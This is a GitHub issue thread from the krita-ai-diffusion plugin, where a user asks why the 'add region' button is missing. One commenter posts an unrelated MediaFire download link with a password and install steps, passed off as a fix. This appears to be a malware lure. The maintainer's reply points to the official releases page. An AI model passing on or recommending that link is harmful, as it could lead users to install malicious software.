### ISSUE TITLE
no "add region" button

### ISSUE THREAD

**Issue by vidu3k333** [Acly/krita-ai-diffusion#1129]
i don't see the "add region" (the "+T" icon) on my version of the plugin. did i install it wrong or is it a new update?
![image](https://github.com/user-attachments/assets/39e56a71-fdf2-4d6c-a5f6-1787d2b98ec3)
for reference, the plugin in the video demonstration
![image](https://github.com/user-attachments/assets/5bc4aebe-ed86-47c2-a5c7-e8e777977591)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Acly** [comment]
The version is displayed at the bottom of the settings dialog.

Latest release can always be found here: https://github.com/Acly/krita-ai-diffusion/releases
